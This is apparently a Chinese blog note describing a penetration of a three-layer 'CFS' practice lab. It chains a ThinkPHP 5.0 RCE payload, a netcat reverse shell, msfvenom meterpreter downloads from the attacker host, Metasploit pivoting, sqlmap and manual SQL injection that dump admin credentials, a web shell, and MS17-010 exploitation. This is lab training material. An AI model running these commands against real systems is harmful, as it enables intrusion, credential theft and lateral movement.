CFS三層靶機滲透
- 2020 年 3 月 9 日
- 筆記
環境搭建
設置3個VMnet網卡
VMnet8設置為出網IP
VMnet8:子網IP:192.168.42.0 子網掩碼:255.255.255.0
設置了 VMnet1(僅主機模式)、VMnet2(僅主機模式),這兩個個網路是不出外網的,也就是當做我們的內網主機!其中它們的子網地址分別是:
VMnet1: 子網IP:192.168.22.0 子網掩碼:255.255.255.0VMnet2: 子網IP:192.168.33.0 子網掩碼:255.255.255.0
網路拓撲圖
在寶塔面板設置好,對於的ip解析網站
對Target1_CentOS 7資訊搜集
root@kepler:~/桌面# nmap -T4 -A 192.168.42.3 --script=vulnStarting Nmap 7.80 ( https://nmap.org ) at 2020-03-03 17:24 CSTPre-scan script results:| broadcast-avahi-dos: | Discovered hosts:| 224.0.0.251| After NULL UDP avahi packet DoS (CVE-2011-1002).|_ Hosts are all up (not vulnerable).Stats: 0:08:44 elapsed; 0 hosts completed (1 up), 1 undergoing Script ScanNSE Timing: About 99.67% done; ETC: 17:33 (0:00:02 remaining)Stats: 0:08:46 elapsed; 0 hosts completed (1 up), 1 undergoing Script ScanNSE Timing: About 99.67% done; ETC: 17:33 (0:00:02 remaining)Nmap scan report for 192.168.42.3Host is up (0.00066s latency).Not shown: 993 closed portsPORT STATE SERVICE VERSION21/tcp open ftp Pure-FTPd|_clamav-exec: ERROR: Script execution failed (use -d to debug)|_sslv2-drown: 22/tcp open ssh OpenSSH 7.4 (protocol 2.0)|_clamav-exec: ERROR: Script execution failed (use -d to debug)| vulners: | cpe:/a:openbsd:openssh:7.4: | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-1590680/tcp open http nginx|_clamav-exec: ERROR: Script execution failed (use -d to debug)|_http-csrf: Couldn't find any CSRF vulnerabilities.|_http-dombased-xss: Couldn't find any DOM based XSS.| http-enum: |_ /robots.txt: Robots file|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.111/tcp open rpcbind 2-4 (RPC #100000)|_clamav-exec: ERROR: Script execution failed (use -d to debug) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind |_ 100000 3,4 111/udp6 rpcbind 888/tcp open http nginx|_clamav-exec: ERROR: Script execution failed (use -d to debug)|_http-csrf: Couldn't find any CSRF vulnerabilities.|_http-dombased-xss: Couldn't find any DOM based XSS.|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.3306/tcp open mysql MySQL (unauthorized)|_clamav-exec: ERROR: Script execution failed (use -d to debug)|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)8888/tcp open http Ajenti http control panel|_clamav-exec: ERROR: Script execution failed (use -d to debug)|_http-csrf: Couldn't find any CSRF vulnerabilities.|_http-dombased-xss: Couldn't find any DOM based XSS.| http-enum: |_ /robots.txt: Robots file|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.MAC Address: 00:0C:29:78:B2:1B (VMware)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hop TRACEROUTEHOP RTT ADDRESS1 0.66 ms 192.168.42.3 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 564.68 seconds
先從80埠開始
發現它是ThinkPHP 框架,版本是 V5.0
想到了ThinkPHP-V5.0-RCE漏洞
根據POC進行命令執行
http://192.168.42.3/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
直接反彈shell
本地監聽nc -lvp 6666nc 192.168.42.4 6666 -e /bin/bash
之後使用
python -c 'import pty;pty.spawn("/bin/bash")'
獲取交互shell
經過測試目標機器,可以使用wget,利用msf生成elf馬。
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.42.4 LPORT=1111 -f elf >shell.elf
在本機創建臨時服務
python -m SimpleHTTPServer 8080
在肉雞上執行下載eif
wget http://192.168.42.4:8080/shell.elfchmod +x shell.elf
在kali機創建監聽
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcpmsf5 exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (linux/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target msf5 exploit(multi/handler) > set LHOST 192.168.42.4LHOST => 192.168.42.4msf5 exploit(multi/handler) > set LPORT 1111LPORT => 1111msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 192.168.42.4:1111
在肉雞上運行elf
使用 MSF 中的這個命令獲取當前的網段:
run get_local_subnets
添加路由
run autoroute -s 192.168.22.0/24
檢查路由規則
route
之後background
使用
auxiliary/scanner/portscan/tcp
對192.168.22.0/24段進行掃描
發現第二層靶機機器
使用代理
auxiliary/server/socks4a
添加成功,之後在/etc/proxychains.conf配置代理
對第二層內網進行掃描
proxychains nmap -Pn -sT 192.168.22.2 因為socket代理不支援arp,icmp這種協議,所以用tcp掃描
之前已經掃描到有80埠
所以先查看80埠服務
使用dirb掃描目錄
proxychains dirb http://192.168.22.2
順便習慣性的查看robots.txt
發現後台
通過查看源程式碼看到提示
之後使用
proxychains sqlmap -u "http://192.168.22.2/index.php?r=vul&keyword=1" #測試注入點
發現是mysql資料庫
proxychains sqlmap -u "http://192.168.22.2/index.php?r=vul&keyword=1" -p keyword --dbs #查看資料庫
proxychains sqlmap -u "http://192.168.22.2/index.php?r=vul&keyword=1" -p keyword -D bagecms --tables
proxychains sqlmap -u "http://192.168.22.2/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin --columns
proxychains sqlmap -u "http://192.168.22.2/index.php?r=vul&keyword=1" -p keyword -D bagecms -T bage_admin -C username,password --dump
拿到帳號密碼
之前環境有問題於是手工注入
判斷欄位http://192.168.22.2/index.php?r=vul&keyword=1' order by 39 --+查庫名http://192.168.22.2/index.php?r=vul&keyword=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,group_concat(schema_name) from information_schema.schemata --+庫名bagecms查表名http://192.168.22.2/index.php?r=vul&keyword=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,group_concat(table_name) from information_schema.tables where table_schema='bagecms' --+表age_ad,bage_admin,bage_admin_group,bage_admin_logger,bage_attr,bage_attr_val,bage_catalog,bage_config,bage_link,bage_page,bage_post,bage_post_2tags,bage_post_album,bage_post_comment,bage_post_tags,bage_question,bage_special,bage_upload查欄位名http://192.168.22.2/index.php?r=vul&keyword=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 group_concat(column_name) from information_schema.columns where table_name='bage_admin' --+欄位id,username,password,realname,group_id,email,qq,notebook,mobile,telephone,last_login_ip,last_login_time,login_count,status_is,create_time查值http://192.168.22.2/index.php?r=vul&keyword=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,group_concat(id,username,password) from bage_admin --+值admin 46f94c8de14fb36680850768ff1b7f2a
只後到網站上md5解密
登錄上網站後之後找可getshell的地方
看到模版地方,
之後
proxychains ./AntSword
打開蟻劍
連接後,使用msf生成elf,由於目標機器處於第二層內網當中
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=1234 -f elf > shell1234.elf使用proxychains msfconsole不然無法連接到
監聽也使用bind_tcp正向連接
之後使用蟻劍上傳shell1234.elf
chmod +x shell1234.elf./shell1234.elf
成功上線
添加路由
run autoroute -s 192.168.33.0/24
之後對內網進行掃描
auxiliary/scanner/smb/smb_version
在第三層內網下
發現Windows7機器
嘗試ms17-010掃描一下試試
use auxiliary/scanner/smb/smb_ms17_010
使用
use exploit/windows/smb/ms17_010_psexec
使用payload 正向,這樣可以順利和shell建立連接
set payload windows/x64/meterpreter/bind_tcp
成功打到第三層內網
